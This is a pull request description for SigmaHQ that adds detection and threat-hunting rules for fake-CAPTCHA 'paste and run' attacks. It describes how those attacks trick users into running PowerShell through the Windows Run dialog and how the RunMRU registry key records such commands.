Added Fake CAPTCHA Campaign new rules

[ahmedfarou22]

Summary of the Pull Request

Many threat actors have been using the Fake CAPTCHA to trick their victims into pasting malicious PowerShell command in the windows run dialog.

I added 2 new rules:

1. A detection rule that looks for suspicious PowerShell commands in the RunMru registry key. this key stores execution from the run dialog.

2. A threat hunting rule that looks for any suspicous commands in the runmru key this is to detect if the threat actor is not using powershell or used the same teqnique capitcha but with diffrent approach this rule has a high false postive becouse it is a hunting rule.

More detailes are mentioned in my blog

Changelog

new: Suspicious PowerShell Commands in RunMRU key
new: Suspicious Commands in RunMRU key (Threat hunting)

Example Log Event

Fixed Issues

SigmaHQ Rule Creation Conventions

• If your PR adds new rules, please consider following and applying these conventions

[ahmedfarou22]

Quick side note:
In Red Canary's latest blog post, Intelligence Insights: October 2024, they referred to this technique as "Paste and run".

Summary from their latest blog (paste and run):
The "paste and run" technique, often called "ClickFix" (coined by Proofpoint), is a malicious tactic observed since early 2024. Attackers use it to trick users into copying and executing PowerShell code by disguising it as a "fix" to access content. Lures include phishing prompts for access fixes or fake CAPTCHAs on compromised websites. For example, a fake CAPTCHA instructs users to click an “I’m not a robot” button, which silently copies malicious code to their clipboard, followed by steps to paste and run it, unknowingly executing the attack.